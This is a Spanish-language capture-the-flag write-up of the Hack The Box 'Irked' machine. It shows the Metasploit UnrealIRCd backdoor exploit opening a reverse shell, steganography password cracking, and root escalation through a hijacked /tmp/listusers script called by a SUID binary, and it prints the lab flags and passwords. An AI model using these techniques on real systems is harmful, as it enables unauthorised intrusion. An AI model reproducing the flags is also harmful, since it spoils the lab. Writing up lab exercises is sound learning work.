Irked

Irked Linux · Easy - Adventure mode

🔭 Reconocimiento:

┌──(pmartinezr㉿kali)-[~/htb/irked]
└─$ nmap -p- -Pn -sSVC  10.129.32.44
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 19:04 CET
Nmap scan report for 10.129.32.44
Host is up (0.057s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38806/udp   status
|   100024  1          44948/udp6  status
|   100024  1          48656/tcp   status
|_  100024  1          59076/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
48656/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.92 seconds

CVE-2010-2075

💣 Preparación:

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP double handler on 10.10.14.110:4444
[*] 10.129.32.44:6697 - Connected to 10.129.32.44:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.129.32.44:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo MQNOvyvaDhkk6qee;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "MQNOvyvaDhkk6qee\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.110:4444 -> 10.129.32.44:57077) at 2026-01-03 19:35:26 +0100
whoami
ircd

👽 Acciones:

ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

Descubrimos una password, que indica que se está haciendo uso de esteganografía, la imagen irked.jpg es bastante sospechosa.

┌──(pmartinezr㉿kali)-[~/htb/irked]
└─$ echo "UPupDOWNdownLRlrBAbaSSss" > dic    

┌──(pmartinezr㉿kali)-[~/htb/irked]
└─$ stegcracker irked.jpg dic 
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2026 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which 
will blast through the rockyou.txt wordlist within 1.9 second as opposed 
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

Counting lines in wordlist..
Attacking file 'irked.jpg' with wordlist 'dic'..
Successfully cracked file with password: UPupDOWNdownLRlrBAbaSSss
Tried 1 passwords
Your file has been written to: irked.jpg.out
UPupDOWNdownLRlrBAbaSSss

┌──(pmartinezr㉿kali)-[~/htb/irked]
└─$ cat irked.jpg.out
Kab6h+m+bbp2J:HG

Haciendo uso de stegcrackerpuedo sacar una segunda password

ircd@irked:/home/djmardov/Documents$ su - djmardov
su - djmardov
Password: Kab6h+m+bbp2J:HG

Esta password nos permite acceder como djmardov

djmardov@irked:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
djmardov@irked:~$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2026-01-03 12:26 (:0)
sh: 1: /tmp/listusers: not found

Encontramos un binario que apunta a un archivo .sh desaparecido

djmardov@irked:~$ touch /tmp/listusers
touch /tmp/listusers
djmardov@irked:~$ cd /tmp/listusers
cd /tmp/listusers
-su: cd: /tmp/listusers: Not a directory
djmardov@irked:~$ cd /tmp
cd /tmp
djmardov@irked:/tmp$ echo "bash -p" > listusers
echo "bash -p" > listusers
djmardov@irked:/tmp$ chmod +x listusers
chmod +x listusers
djmardov@irked:/tmp$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2026-01-03 12:26 (:0)
root@irked:~# cat user.txt
cat user.txt
6d77cff4b4739f43b091ea936647ddc3
root@irked:~# cat /root/root.txt
cat /root/root.txt
409b2d91fdf3b5016fdd847c331e517f

La elevación de privilegios se hace sencilla, si podemos escribir nosotros que contiene el fichero /tmp/listusers.

achivement

Para escribir este post me he basado en una herramienta de fabricación propia ¿contribuyes? 🪲DarkReport